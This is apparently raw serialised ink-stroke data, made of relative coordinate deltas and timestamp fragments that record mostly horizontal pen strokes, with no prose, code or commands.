0 15,-18 0-15,1 0 16,0 0-16,-19 0 15,1 0-15,0 0 16,-17 0-16,-1 0 16,0 0-16,36 0 15,-18 0-15,17 0 16,18 0-16,36 17 16,-1-17-16,18 0 15,53 0-15,-35 0 16,0 0-16,35 36 15,-53-19-15,53 19 16,-53-19-16,36 1 16,-72-1-16,54-17 15,-53 0-15,35 0 16,0 0-16,-35 0 16,-35 0-16,-19 0 15,-16 0 1,-19 0-16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6:00.6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438 3986 0,'0'-17'15,"53"17"-15,18 0 16,70 0-16,53 0 16,53 0-16,17 0 15,19 0-15,193 0 16,-123 0-16,-54 0 15,-52 0-15,-35 0 16,-71 0-16,-88 0 16,-35 0-16,-1 17 109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6:01.9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532 1993 0,'0'-35'31,"70"17"-15,71 1-16,18-1 15,71-17-15,34-18 16,18 53-16,18 0 15,71 0-15,17 0 16,-36 0-16,72 0 16,-36 0-16,0 0 15,-53 0-15,106 0 16,-18 0-16,-123 0 16,176 0-16,-35 0 15,-105 0-15,-1 0 16,0 0-16,-71 0 15,-17 0-15,-17 0 16,-36 0-16,-36 0 16,-34 0-16,-1 0 15,-52 0-15,-1 0 16,-17 0 0,-35 0-16,17 0 15,-17 0-15,0 0 16,-1-18-1,19 18 32,16 0-47,37 0 16,-1 0-16,53 0 16,0 0-16,0 18 15,-17-18-15,17 0 16,-35 0-16,-18 0 15,-35 0-15,-18 0 16,-17 0-16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7:08.0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74 2011 0,'0'0'0,"-17"0"16,34-18 78,107 1-94,17-1 15,88-17-15,36 17 16,70-35-16,212 0 15,-1 0-15,54-17 16,70 70-16,-105 0 16,35-88-16,-107 88 15,-16-18 1,-36 18-16,-106 0 16,-35 0-16,-36-53 15,-52 35-15,17 18 16,36 0-16,-18 0 15,35 0-15,71 0 16,123 0-16,-53 0 16,-70 0-16,18 0 15,-19 0-15,-17 0 16,-52 0-16,-36 0 16,-18 0-16,-17 0 15,-54 0-15,-17 0 16,-17 0-16,-36 0 15,36 36-15,-1-1 16,-17 0-16,0 0 16,0-17-16,-1 0 15,1-18-15,-18 17 16,54-17-16,-19 0 16,53 0-16,-17 0 15,0 0-15,35 0 16,-18 0-16,18 0 15,-53 0-15,53 0 16,-52 0 0,-37 0-16,1 0 15,-53 0-15,-18 0 16,-17-17-16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24.4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88 11659 0,'0'-17'218,"18"-19"-186,34 19-32,72-1 15,-18-35-15,-18 53 16,88 0-16,-17 0 16,35 0-16,-53-35 15,-17 35-15,-18 0 16,17 0-16,-52 0 15,17 0-15,-71 0 16,19 0 0,-19 0 31,19 0-47,-19 0 15,19 0-15,-19 0 16,1 0-16,17 0 15,18 0-15,-18 0 16,18 0-16,71 0 16,-1 18-16,-17-1 15,35-17-15,-35 18 16,0-18-16,-36 0 16,1 0-1,-18 0-15,17 0 16,1 0-16,-18 0 15,17 17-15,-17 19 16,-17-36-16,16 0 16,1 0-16,-17 0 15,17 0-15,-18 0 16,0 0-16,0 0 16,18 17-16,53-17 15,-53 0-15,18 0 16,-36 0-16,35 0 15,-17 18-15,0-18 16,0 0-16,53 35 16,-71-35-16,54 18 15,-37-18-15,37 18 16,-19 17-16,-35-35 16,18 0-16,0 0 15,-17 0-15,-1 0 16,0 0-1,-17 0 1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8:34.9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178 6262 0,'17'0'94,"36"0"-78,35-18-16,36 18 15,-1 0-15,36 0 16,-18 0-16,0 0 16,18 0-16,-18 0 15,0 0-15,-35 0 16,-18 0-16,-17 0 16,17 0-16,-17 0 15,-1 0-15,-17 0 16,-18 0-16,18 0 15,-17 0 1,-1 0-16,18 0 16,-18 0-16,18 0 15,0 0-15,0 0 16,17 0-16,-17 0 16,0 0-16,18 0 15,-18 0-15,17 0 16,1 0-16,-1 0 15,36 0-15,-35 0 16,17 0-16,18 0 16,-36 0-16,1 0 15,-1 0-15,1 0 16,-18 0-16,0 0 16,0 0-16,0 0 15,0 0-15,-1 0 16,37 0-16,16 0 15,-16 0-15,-19 0 16,36 0-16,0 0 16,17 0-16,18 0 15,1 0-15,-1 0 16,0 0-16,0 0 16,-18 0-1,1 0-15,-36 0 16,36 0-16,-54 18 15,36-1-15,-36 1 16,36 0-16,-70-18 16,34 0-16,-35 0 15,1 0-15,-1 17 16,0-17-16,-17 0 16,0 0-16,17 0 15,-18 0 1,1 0-1,0 0 1,-1 0-16,36 0 16,-17 0-16,16 0 15,19 0-15,0 0 16,34-17-16,-52 17 16,18 0-16,-1 0 15,1 0-15,17 0 16,-17 0-16,-18 0 15,0 0-15,-18-18 16,-18 18-16,1-18 16,0 18-1,-1 0-15,1 0 32,0 0 108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02.1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309 1834 0,'0'18'16,"0"0"-1,71-1-15,70 1 16,35 0-16,1-18 16,52 0-16,71 0 15,-18 0-15,106 0 16,-53 0-16,106 0 16,-106 0-1,1 0-15,-1 0 16,-35 0-16,-18 0 15,71 0-15,-106 0 16,35 0-16,-53 0 16,36 0-16,-36 0 15,53 0-15,-17 0 16,17 0-16,-17 0 16,-36 0-16,0 0 15,-35 0-15,53 0 16,-18 17-16,1 19 15,17-19-15,-36 36 16,36-35-16,-35-18 16,0 0-16,-54 0 15,-17 0-15,1 0 16,-19-18-16,1-17 16,-54 0-16,18 35 15,-35 0-15,0-18 16,0 18-16,18 0 15,17 0-15,0 0 16,35 0-16,19 18 16,34 17-16,36 18 15,-36-18 1,36-17-16,-36-1 16,18-17-16,0 0 15,-35 0-15,35 0 16,-53 0-16,0 0 15,-35 0-15,-18 0 16,-17 0-16,-54 0 16,1 0-16,0 0 31,-1-17 0,1 17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10.335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5733 6121 0,'0'0'0,"17"0"15,1 0-15,17 0 16,0 0-16,1 0 16,34 0-16,-17 0 15,18 0-15,-1 17 16,19-17-16,-19 0 16,-17 18-16,-18-18 15,-17 18-15,17-18 16,-17 0-1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12.01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6668 6103 0,'17'0'47,"1"0"-47,35 0 16,-36 0-1,36 0-15,-17 0 16,-1 0-16,18 0 15,0 0-15,-18 0 16,18 0-16,-18 0 16,0 0-1,1 0-15,-1 0 0,0 0 16,-17 0-16,0 0 16,17 0-1,0 0-15,-17 0 16,17 0-16,18 0 15,17 18-15,-17-18 16,18 17-16,35 1 16,-36 0-16,1-18 15,17 17-15,-17-17 16,-1 0-16,-35 18 16,18-18-16,0 0 15,-17 0-15,-19 0 16,1 0-16,-1 0 15,1 0 1,0 0 203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13.906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8943 6085 0,'18'0'109,"-1"0"-109,54 0 16,17 0-16,18 0 16,-18 0-16,53 36 15,0-19-15,18 1 16,0 0-16,35-18 16,-36 0-16,1 0 15,-18 0-15,36 0 16,-107 0-1,18 0-15,-52 0 0,-1 0 16,-17 0-16,17 0 16,-35-18 62,18 18-63,-1 0-15,1 0 16,-1-18-16,1 18 16,0 0-1,-1 0 1,-17-17 0,18 17-1,0 0 1,17 0-1,0 0-15,1 0 16,-1 0-16,18 0 16,-18 0-16,18 0 15,-18 0-15,0 0 16,1 0-16,-19 0 203,1 0-187,0 0-16,70 17 15,-53-17-15,36 0 16,-18 0-16,0 0 16,35 0-16,-18 0 15,18 0-15,18 0 16,-18 0-16,36 0 15,-36 0-15,36 0 16,-1 0-16,-17 0 16,0 0-16,35 36 15,-53-36-15,36 17 16,-1-17 0,0 0-16,-17 0 0,18 0 15,-18 0 1,-1 0-16,-34 0 15,35 0-15,-18 0 16,-17 0-16,17 0 16,-18 0-16,-17 0 15,18 0-15,-18 0 16,17 0-16,1 0 16,-18 0-16,0 0 15,0 0-15,-36 0 16,19 0-16,-1 0 15,-18 0-15,1 0 16,17-17-16,-17 17 16,17 0-1,-17 0 1,0 0-16,-1 0 16,1 0-16,-1 0 15,1 0-15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16.016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4075 6720 0,'0'0'0,"35"0"16,18 0-16,-18 0 15,-17 0-15,17 0 16,-17 0-16,17 0 16,-17 0-16,-1 0 15,18 0 1,18 0-16,18 0 15,-1 0-15,19 0 16,34 0-16,-35 0 16,36 0-16,52-35 15,-17 18-15,17-1 16,-17 0-16,0 18 16,35 0-16,18 0 15,-1 0-15,19 0 16,-1 0-16,35 0 15,19 0-15,-1 0 16,71 0-16,70 0 16,71-35-16,-53 17 15,-106 18-15,-35 0 16,-18 0 0,-70 0-16,-18 0 0,17 0 15,1 0-15,-53 0 16,17 0-1,-35 36-15,-17-36 16,-36 17-16,0-17 16,-35 18-16,18-18 15,-18 18-15,-1-18 16,19 0-16,-18 0 16,0 0-16,0 0 15,0 0-15,-18 0 16,18 0-16,-18 0 15,0 0-15,-17 0 16,0 0-16,-1 0 16,-17 17-16,18-17 15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39:35.21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4374 11677 0,'36'0'110,"-19"18"-95,36-1 1,-17-17-16,-1 0 16,0 0-16,18 0 15,0 0-15,18 0 16,-19 0-16,1 0 15,18 18 1,-36-18-16,18 0 16,-18 0-16,1 0 15,-1 0-15,0 0 16,-17 0 0,35 0-1,-36 0-15,36 0 16,0 18-16,0-18 15,18 17-15,-1 1 16,1-18-16,17 17 16,-17 1-16,-19-18 15,1 0-15,0 0 16,-17 0-16,-1 0 16,-17 0-16,17 18 15,-18-18 1,1 0-16,0 0 15,-1 0-15,19 0 16,-19 0 0,19 0-16,-1 0 15,0-18-15,18 18 16,0 0-16,-18-18 16,0 18-16,18 0 15,0 0-15,-17 0 16,17 0-16,-18 0 15,18 0-15,-18 0 16,18 0-16,-18 0 16,0 0-16,18 0 15,0-17-15,-17 17 16,-1 0-16,-18 0 16,19-18-16,-1 18 15,18-17-15,-18 17 16,-17 0-16,17-18 15,0 18-15,-17 0 16,17 0-16,1 0 16,-19 0-16,19 0 15,-19-18-15,18 1 16,-17 17-16,0 0 16,-1 0-1,1 0 1,0 0-1,-18-18-15,17 18 16,1 0 0,0 0-1,-1 0 1,18-18-16,-17 18 16,0 0-16,-1 0 15,19 0-15,-1 0 16,0 0-1,1 0-15,-19 0 16,18 0-16,-17 0 16,35 0-16,-18 0 15,-17 0-15,0 0 16,17 0-16,-18 0 16,1 0-16,17 0 15,18 0 1,0 0-16,0 0 0,0 0 15,-18 0-15,1 0 16,-19 0 0,1 0-16,17 0 0,-17 0 15,-1 0 126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07.32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8608 12171 0,'17'0'31,"1"0"-15,0 0 15,-1 0-15,1 0 0,17 0-16,-17 0 15,0 0 1,-1 0-16,1 0 15,17 0-15,0 0 16,-17 0-16,35 0 16,-18 0-16,-17 0 15,35 0-15,-36 0 16,19 0-16,-1 0 16,-17 0-16,35 0 15,-18 0 1,-18 0-16,19 0 15,-1 0-15,0 0 16,1 0-16,16 0 16,-16 0-1,34 0-15,-17 0 0,18 0 16,-1 0-16,1 0 16,-18 0-16,17 0 15,1 0 1,-18 0-16,0 0 15,0 0-15,0 0 16,-36 0-16,18 0 16,1 0-16,-19 0 15,36 0-15,-17 0 16,17 0-16,-18 0 16,0 0-16,-17 0 15,17 0-15,0 0 16,-17 0-16,-4075 0 15,8167 0-15,-4093 0 16,1 0 0,0 0-16,-1 0 15,1 0-15,0 0 16,-1 0-16,1 0 16,0 17-16,34-17 15,-34 0-15,17 0 16,-17 0-16,35 18 15,-18-18-15,18 0 16,18 18-16,-18-18 16,17 17-16,-35-17 15,18 0-15,-17 0 16,-1 0 0,0 0-16,18 0 15,-35 0-15,17 0 16,0 0-16,1 18 15,-1-18-15,0 0 16,-17 0-16,-1 0 16,1 0-16,0 0 15,-1 0 1,1 0 0,0 0-1,17 0-15,-17 0 16,17 0-16,0 0 15,0 0-15,1 0 16,-19 0-16,1 0 16,17 0-16,-17 0 31,-1 0 31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22.52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235 16369 0,'17'0'47,"1"0"-47,0 0 15,-1 0 1,19 0-16,-19 0 16,18 0-1,1 0 1,-1 0-16,0 0 15,1 0-15,17 0 16,-1 0-16,1 0 16,-17 0-16,17 0 15,-1 0-15,-16 0 16,34 18-16,-34-18 16,-1 17-16,18-17 15,0 18-15,0-18 16,-18 0-16,-18 0 15,1 0-15,17 0 16,-17 0 0,0 0-16,-1 0 15,1 0 17,0 0-32,17 0 15,-17 0 1,-1 0-16,18 0 15,1 0-15,-1 0 16,-17 0-16,17 0 16,0 0-16,18 0 15,0 0-15,18 0 16,-1 0-16,-17 0 16,18 0-16,17 0 15,-35 0-15,-18 0 16,18 0-16,0 0 15,-36 0-15,1 0 16,17 0-16,-17 17 16,17-17-16,1 0 15,-1 18-15,18-18 16,0 18-16,0-18 16,17 0-16,-17 0 15,0 0-15,0 0 16,-18 0-16,-17 0 15,-1 0-15,1 0 16,0 0 62,-1 0-78,1 0 16,0 0-16,-1 0 15,19 0-15,-1 0 16,0 0-16,0 0 16,-17 0-16,17 0 15,-17 0-15,0 0 16,-1 0 0,1 0 15,0 0 31,-18-18-30,17 18-1,1 0 47,-1 0-47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35.79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4023 16334 0,'-18'-18'63,"54"18"-32,-1 0-31,0 0 15,-17-18-15,17 18 16,0-17-16,1 17 16,-1 0-16,-17 0 15,34 0-15,-34-18 16,17 18-16,-17 0 16,17 0-16,-17 0 15,0 0 1,-1 0-1,1 0 1,17 0-16,-17 0 16,17 0-16,-17 0 15,17 0 1,0 0-16,-17 0 0,-1 0 16,1 0-16,0 0 31,-1 0 0,19 0-15,-19 0-16,1 0 15,0 0 1,-1 0 0,1 0-1,-1 0 79,1 0-32,0 0-15,-1 0-47,1 0 94,0 0-3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07T05:44:31.4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22 5680 0,'35'-18'156,"71"18"-156,53 0 16,-18 0-16,88 0 16,71-18-16,-70-34 15,87 52-15,124 0 16,35 0-16,53 0 15,-52 0-15,52 0 16,-176 0-16,-18 17 16,-71-17-16,-70 0 15,-53 0-15,-35 0 16,-53 0 0,-18 0-16,1 0 0,-54 0 515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38.655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6809 16439 0,'17'0'79,"1"0"-79,17 0 15,-17 0-15,17 0 16,18 0-1,-18 0-15,18 0 16,-35 0-16,17 0 16,-17 0-16,17 0 15,-17 0-15,-1 0 16,1 0-16,17-17 16,-17 17-1,0 0-15,17 0 16,-18 0-16,1 0 15,17 0-15,1 0 16,-1 0-16,0 0 16,18 0-16,-18 0 15,1 0-15,-1 0 16,0 0-16,0 0 16,-17 0-1,0 0-15,-1 0 16,1 0-16,0 0 15,-1 0-15,19 0 16,-19 0-16,19 0 16,-1 0-16,18 0 15,-18 0 1,18 0-16,-18 0 16,-17 0-16,17 0 0,0 0 15,-17 0 1,0 0-16,-1 0 15,19 0-15,-19 0 16,18 0-16,-17 0 16,17 0-16,1 0 15,-1 0-15,0 0 16,0 0-16,1 0 16,-1 0-16,18 0 15,-35 0-15,-1 0 16,1 0-1,0 0-15,-1 0 16,1 0-16,-1 0 31,19 0-31,-1 0 0,18 0 16,-18 0-16,18 0 16,-18 0-1,36 0-15,-18 0 16,0 0-16,0 0 15,17 0-15,-17 0 16,0 0-16,18 0 16,-18 0-16,-1 0 15,1 0-15,-17 0 16,17 0-16,-18 0 16,18 0-16,-18 0 15,36 0-15,-36 0 16,18 0-16,17 0 15,-17 0-15,0 0 16,0 0-16,-18 0 16,1 0-16,-19 0 15,19 0-15,-1 0 16,0 0-16,0 0 16,1 0-16,-19 0 15,1 0-15,35 0 16,-35 0-16,-1 0 15,1 0 1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53.711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2488 12100 0,'-35'0'15,"17"0"1,1 0-16,-19 0 16,1 0-16,-35 0 15,-1 0-15,-17 0 16,-18 0-16,0 0 16,-17 0-16,17 0 15,18 0-15,0 0 16,-18 0-16,18 0 15,-18 0-15,35 0 16,36 0-16,0 0 16,17 0-16,0 0 15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56.591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7745 12188 0,'-36'18'15,"1"-18"1,0 0-16,17 0 16,1 0-16,-1 0 15,0 0-15,1 0 16,-1 0 0,-17 0-16,-1 0 15,-16 0-15,-1 0 16,-18 0-16,18 0 15,-17 0-15,-1 0 16,1 0-16,17 0 16,17 0-16,1 0 15,17 0 1,1 0-16,-1 0 16,1 0-1,-19 0-15,1 0 16,0 0-16,-18 0 15,-18 0-15,18 0 16,-17 0-16,-1 0 16,1 0-16,17 0 15,0 0-15,17 0 16,1 0-16,0 0 16,0-18-16,-18 1 15,0 17-15,0-18 16,-18 18-16,-17 0 15,18-17-15,17 17 16,0-18-16,18 18 16,17 0-16,0 0 15,1 0-15,-1 0 16,0 0 109,1 0 16,-1 0-141,0 0 15,-17 18 1,17-18-16,1 0 15,-1 0-15,-17 0 16,17 0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0:40:57.489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4552 12206 0,'-18'0'94,"18"18"-94,-17-18 15,-18 0-15,-18 0 16,-18 0-16,1 0 16,-54 0-16,18 0 15,-35 0-15,-35 0 16,52 0-16,18 0 15,18-18-15,71 0 16,-1 18-16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06.50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091 7373 0,'17'0'32,"1"0"-17,0 0 1,17 18-1,18-1-15,17 1 16,54 0 0,-18-18-16,70 0 15,-17 0-15,0 0 16,-18 0-16,35 0 16,-35 0-16,0 0 15,0 0-15,-52 0 16,16 0-16,-16 0 15,-54 0-15,-17 0 32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24.4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184 7391 0,'0'0'0,"36"0"15,-1 0-15,0 0 16,-17 0-16,70 0 15,-53 0 1,54 0 0,34 0-1,-105 0 1,-1 0-16,1 0 16,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0-16,18 0 16,1 0-16,-1 0 15,-17 0-15,17 0 16,0 0-16,0 0 16,-17 0-16,0 0 15,17 0-15,-17 0 16,-1 0-1,19 0-15,-1 0 16,18 0-16,0 0 16,17 0-16,18 0 15,-17 0-15,0 0 16,17 0-16,35 0 16,1 0-16,17 0 15,-18 17-15,-17 1 16,18 0-16,-1-1 15,1-17-15,-1 18 16,-35-18-16,36 18 16,-1-1-1,265 36 1,-264-35 0,193 52-1,106-34 1,-281-19-1,157 18 1,37 18 0,-266-53-1,36 0 1,0 0 0,-71 0-1,36 0 1,70 0-1,-71-17 1,54-1 0,35 18-1,70 0 1,-159 0 0,89 0-1,70 0 16,-17 0-15,53-18 0,-159 1-1,-18-1-15,18 18 16,17-35-16,18 17 16,-17 1-1,17 17-15,-18-18 0,-35 18 16,18 0-16,-18 0 15,-17 0-15,52 0 16,-70 0 0,-17 0-1,17 0-15,-18 0 16,-17 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28.7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34 5909 0,'18'0'94,"52"0"-79,36 0-15,-18 0 16,36-18-1,34 1-15,72-1 16,-107 18 0,89 0-1,17 0 1,-123 0-16,18 0 16,-19 0-16,19 0 15,264 0 1,-300 0-1,18 0 1,-53 0 0,-36 0 62,19 0-63,-19 0-15,1 0 16,88 0 0,-53 0-1,0 0-15,35 0 16,0 0-16,18 35 16,-18-35-16,18 18 15,-35 0-15,-19-18 16,1 0-16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36.5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638 5856 0,'17'0'47,"19"0"-32,16 0-15,54 0 16,18 18-16,35 17 16,229-17-1,-18-1 1,-35-17 0,-300 0-1,-17 0 1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46.1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951 4586 0,'0'-18'47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47.8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11 4533 0,'17'0'31,"18"0"-31,1 0 16,-1 0-16,18 0 16,0 0-16,-18 0 15,18 0-15,35 0 31,-35 0-31,-35 0 0,35-17 16,-18 17-16,18 0 16,-18-18-1,0 18-15,1 0 0,34-18 32,1 1-17,-18 17 1,0-18-1,35 18 1,18 0 0,88 0-1,17 0 1,36 35 0,18-17-1,-36-18 1,1 0-1,-107 0 1,-35 0 0,-70 0-1,0 0-15,70 0 16,-71 0-16,19 0 16,69 0-1,37 0 1,-90 0-1,19 0-15,0 0 16,-18 0-16,-1 0 0,1 0 16,53 0-1,88 0 17,-176 0-17,-1 0-15,1 0 16,0 0-1,-1 0 95,1 0-95,0 0 1,-1 0-16,1 0 16,0 0-1,-1 0 1,1 0-16,0 0 16,-1 0-16,18 0 15,1 0 1,-19 0-16,1 0 0,17 0 15,1 0 1,-19 0-16,1 0 16,-1 0-16,19 0 15,-19 0 1,1 0 15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0:13.1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757 7203,'18'0,"0"0,18 0,1 0,17 0,55 0,18 0,-36 0,-1 0,1 0,0 0,-19 0,-17 0,17 0,-17 0,-19 0,0 0,1 0,-19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48.7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66 4657 0,'17'-18'47,"18"18"-31,1 0-1,17 0-15,52 0 16,178 18 0,264-18-1,-124 0 16,-370 0-31,0 0 16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56.7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39 1976 0,'35'0'94,"18"0"-78,17 0-16,54 0 15,-1 0 1,18 0-16,18 0 0,35 0 16,159 0-1,-53 0 1,-177 0-16,-34 0 16,34 0-1,-88 0 1,-17 0-1,0 0 64,17 0-48,-18 0-31,1 0 15,70 0 1,-35 0-16,141 0 31,-106 0-31,18 0 0,-18 0 16,-35 0-16,-35 0 16,0 0-16,-1 0 15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6:57.7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354 1729 0,'18'0'47,"-1"0"-47,1 0 15,0 0-15,35 0 16,-1 0-16,19 0 16,0 0-16,228 0 31,-193 0-16,0 0-15,0 0 16,0 17-16,17 1 16,-35 0-1,1-18 1,-19 17 0,-52-17 15,-1 0-16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14.1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495 4516 0,'0'0'0,"0"-18"94,-17 18-47,-1 0-47,0 0 16,-35 0-16,0 0 15,0 0-15,-35 0 16,0 0-16,-18 0 15,-105 0 1,17 0 0,88 0-1,-18 0 1,89 0 0,-71 0-1,-35 0 1,70 0-16,-34 0 15,16 0-15,19 0 16,-36 0 0,35 0-1,36 0 1,0 0 0,0 0-1,-18 0 1,-18 0-1,-52 18 1,87-18 0,-16 17-16,16-17 15,19 0-15,-19 0 16,1 0-16,17 0 16,-17 0-16,18 0 15,-19 0-15,-17 0 16,18 0-16,-18 0 15,18 0-15,-36 0 32,54 0-32,-19 0 0,19 0 15,-1 0-15,0 0 16,1 0 15,-1 0 0,1 0 94,-1 0-109,0 0 0,-17 0-1,17 0-15,1 0 16,-54 0 0,36 0-1,0 0-15,-18 0 16,35 0-16,-17 0 15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15.7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441 4621 0,'-18'0'46,"-35"0"-30,-17 0-16,-18 0 16,-36 0-16,1 0 15,-19 0 1,-299 0 0,265 0-1,-177-17 1,-141-54-1,389 54 1,-37 17 0,90 0-1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17.1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833 4357 0,'0'0'0,"-18"0"0,1 17 16,-1-17-1,0 0-15,-17 0 16,-18 0-16,0 0 16,-53 0-16,-193 0 15,140 0 1,-35 0-16,0 0 15,35 0-15,0 0 16,18 0-16,35 0 16,0 0-16,18 0 15,35 0-15,18 0 16,17 0 78,-17 0-79,18 0 1,-19 0-16,19 0 16,-1 0-16,-141 0 31,124 0-31,-18 0 15,18 0-15,17 0 16,0 0-16,1 0 78,-1 0-78,1 0 16,-1 0-1,0 0-15,1 0 16,-1 0 0,0 18-1,1-18 17,-1 0-17,0 18 1,-17-18-16,-18 0 15,-106 17 1,89-17-16,-4075 18 16,8166 0-16,-4073-18 15,-1 17-15,17-17 16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18.3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657 4374 0,'0'0'0,"-18"-17"16,-17 17-1,-1 0-15,1 0 16,-18 0-16,18 0 16,0 0-16,-1 0 15,-16 0-15,-1 0 16,-88-18-1,35 18-15,-18 0 16,-17 0-16,0 0 16,-159 0-1,141 0 1,-158 0 0,105 0-1,195 0 1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21.2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145 6227 0,'0'-18'31,"0"-17"-15,-35 17-1,-18 0 1,-18 18-16,-105 0 31,17 0-31,71 0 16,35 0-16,0 0 15,36 18-15,-1-18 16,0 0-16,1 0 62,-1 0-46,0 18 0,1-18-16,-1 0 0,-35 0 15,18 17-15,0-17 16,-18 0 0,-53 0-1,0 0 1,71 18-1,17-18-15,1 0 16,-1 0 0,0 0 15,1 18-15,-1-18-1,-17 0 1,17 17-1,-17-17 1,17 0 0,0 0-1,1 0 79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23.2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624 6262 0,'0'0'0,"18"0"15,-1-18 1,1 18 0,0 0-1,17 0-15,18 0 16,0 0-16,35 0 15,212 0 1,0 0 15,-195 0-31,-34 0 16,0 0-16,-19 0 16,72 0-1,-71 0-15,17 0 16,1 0-16,17 0 15,89 0 1,-125 0 0,54 0-1,-18 18 1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24.5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38 6279 0,'18'0'16,"-1"0"-1,19 0 1,-19 0-16,36 0 0,0 0 16,18 0-1,17 0-15,353 0 32,-282 0-32,-1 0 15,-17 0-15,-17 0 16,-1 0-16,-34 0 15,-1 0-15,0 18 16,-35-18-16,17 0 16,-34 0-16,-1 0 15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0:20.84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983 11938,'18'0,"0"0,0 0,19 0,-1-18,0 18,19 0,17 0,-17 0,-1 0,1 0,-1 0,19 0,-19 0,0 0,1 0,17 0,-17 0,-1 0,19 0,-1 0,19 0,18 0,-18 0,18 0,-19 0,37 0,-36 0,36 0,0 0,-36 0,54 0,-18 0,0 0,18 0,-18 0,-36 0,-1 0,37 0,-54 0,72 0,-36 0,-18 0,-37 0,19 0,36 0,-19 0,-35 0,17 0,1 0,-1 0,1 0,0 0,17 0,19 18,0-18,-18 0,18 0,-19 0,19 0,-18 0,-19 0,-17 0,36 0,-19 0,-17 0,35 0,-35 0,-1 0,19 0,36 0,-37 0,-17 0,-19 0,18 0,1 0,-1 0,1 0,17 0,1 0,-19 18,19-18,-1 0,37 0,-36 0,-1 0,-17 0,-1 0,1 0,-19 0,0 0,0 0,-17 0,-1 0,0 0,18 0,-18 0,0 0,19 0,17 0,1 0,-1 0,19 0,17 0,1 0,18 0,0 0,18 0,-18 0,-19 0,1 0,36 0,-18 0,-73 0,73 0,-55 0,1 0,-19 0,19 0,-19 0,18 0,-17 0,17 0,-18 0,1 0,-1 0,18 0,-17 0,-1 0,0 0,0 0,19 0,-19 0,37 0,-1 0,-35 0,17 0,0 0,1 0,-1 18,19-18,-19 0,1 0,-1 0,-18 0,1 0,-1 0,0 0,19 0,-19 0,18 0,1 0,-1 0,19 0,-1 0,-17 0,-1 0,1 0,-1 0,19 0,-37 0,-18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27.3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452 8079 0,'17'-18'15,"1"0"1,0 18 0,52-17-1,71-1 17,-17 18-32,352 0 15,-247 0 1,36 0-16,176 0 15,-300 18 1,-35 17-16,-53-17 16,0-1-16,-18-17 15,-17 0-15,35-17 16,-36-19-16,19 19 16,-36-1-16,17-17 15,1 52 32,-1 19-31,-17-1-16,36-17 15,-36-1-15,35-17 16,-17 0-16,-1 0 16,1 0-1,0 0 1,-1 0 15,1 0 16,-1 0-31,36 0-1,-17-17 1,-19 17-1,1 0 79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28.11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85 7938 0,'71'0'46,"34"0"-30,1 0-16,0 0 16,35 0-16,0 0 15,0 0-15,1 0 16,-1 0-16,0 0 16,229 35-1,-229-18 16,-4198-17-15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30.48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748 7938 0,'17'0'94,"18"0"-94,36 0 16,0 0-16,17 0 15,-18 0-15,54 0 16,-18 0-16,52 0 31,-52 0-31,-35 0 0,17 0 16,18 0-16,-36 0 15,1 0-15,70 0 16,-88 0 0,17 0-1,1 0-15,0 0 0,52 0 16,0 0 0,36 0-16,-35 0 15,17 0-15,18 0 16,387 0-1,319 0 32,-724 0-47,247 0 32,-71 52-17,1-16 16,-177-19-15,-70-17 0,-36 0-1,18 0 1,-36 18 0,-4074-18-1,8150 0 1,-4058 0-1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32.5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173 8026 0,'0'-18'31,"36"18"-31,17 0 16,17-18-16,36 1 15,-35 17-15,176-18 16,-142 18 0,178 0-1,211 0 1,-318 0 0,124 0-1,-18 0 1,-141 0-16,-17 0 15,-1 0-15,-35 0 16,0 0 0,-52 18-16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8:34.0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40 9278 0,'0'0'0,"35"0"0,1 0 16,-19 0-16,1 0 15,0 0 48,17 0-63,18 0 15,17 0-15,19 0 16,34 0-16,18 0 16,0 0-16,230 0 15,-177 0 1,-36 0 0,36 0-16,1 0 15,16 0-15,1 0 16,229 0-1,-71 0 1,-176 0-16,-53 0 16,0 0-16,-35 0 15,71 0 1,-54 0 0,1 0-1,52 0 1,336-53 31,-389 53-47,-35 0 15,0 0-15,18 0 16,194 0 0,-18-35 15,-141 35-16,36 0 1,-18 0 0,70 70-1,-35-17 1,-106-17-16,-53-36 16,1 17-16,-1-17 15,-17 0 1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39.71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567 11077 0,'18'0'63,"-1"0"-63,36 0 16,0 0-16,18 0 15,-1 0-15,36 0 16,-18 0-16,53 0 15,1 0 1,34 0-16,177 0 16,88 0 15,-353 0-31,-18 0 16,-17 0-16,-35 0 15,17 0 220,1 0-235,34 0 15,1 0-15,17 0 16,159 0-1,-141 0 1,17 0-16,-4127 0 16,8255 0-1,-4233 0 63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41.1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27 11218 0,'0'-17'16,"-18"17"0,1 0-16,-18-18 31,17 18-31,0 0 0,-17 0 15,17 0-15,1 0 16,-36 0 0,18 0-16,-1 0 15,-17 0-15,-17 0 16,-1 0-16,1 0 16,-54 0-16,36 0 15,-35 0-15,-1 0 16,36 0-16,-36 18 15,54-18-15,-36 0 16,53 17-16,0-17 16,-17 18-1,34 0-15,-52-18 16,70 0 78,1 0-79,-1 0 17,1 17-17,-1-17 1,-17 0-1,-36 18 1,-17 0 0,-36-1-1,1 1 17,88-18-17,17 0 48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48.4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52 12894 0,'17'0'94,"36"0"-78,0 0-16,71 18 15,17-1-15,35 1 16,18 0-1,388 52 1,-388-52 0,124-18-1,-89 0 1,-176 0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49.7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84 12894 0,'18'0'93,"34"0"-93,37 0 16,52 0-16,17 0 16,231 0-1,-142 0-15,-36 0 16,18 0-16,18 0 16,177 0-1,-283 0-15,-18 0 16,-34 0-16,-37 0 15,37 0 1,-54 0 0,53 0-1,247 0 1,194 0 15,-52 0-15,-354 0-1,71 0 1,-35 0 0,-141 0-1,-1 0 1,18 0 171,-17 0-171,17 0 0,-17 0-1,0 18-15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51.6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098 13000 0,'0'18'16,"35"-18"15,0 0-31,18-18 16,0 18-16,-4057-35 15,8184 35-15,-4039-18 16,-17 0-16,387 1 31,-317-1-31,0 18 16,-17 0-16,17 0 15,18 0-15,-1 0 16,-34 0-16,17 0 16,-36 0-16,36 0 15,0 0 1,-17 0-16,17 0 0,-18 0 15,1 0-15,-36 0 16,0 0 0,-18 0-16,-52 0 15,-18 0-15,-36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0:23.8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880 10741,'37'0,"-1"0,18 0,1 0,36 0,-1 0,55 0,-36 0,0 0,-36 0,17 0,1 18,-18 0,-1-18,-17 0,-19 0,0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19:53.8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16 14340 0,'0'0'0,"53"0"0,0 0 16,18 0-16,17 0 15,71 0-15,17 0 16,36-17-1,35-1-15,335 18 16,-300 0-16,600 0 47,-706 0-47,-158 0 16,-53 0 30,-4057 0-30,8113 0 0,-4021 18 140,18-18-140,52 0-16,19 0 15,34 0-15,36 0 16,176 17-1,124 19 17,-354-36-32,1 17 0,-71 1 15,-17-18-15,0 0 16,-36 0 234,-17 0-234,0 0-1,17 0-15,-17 0 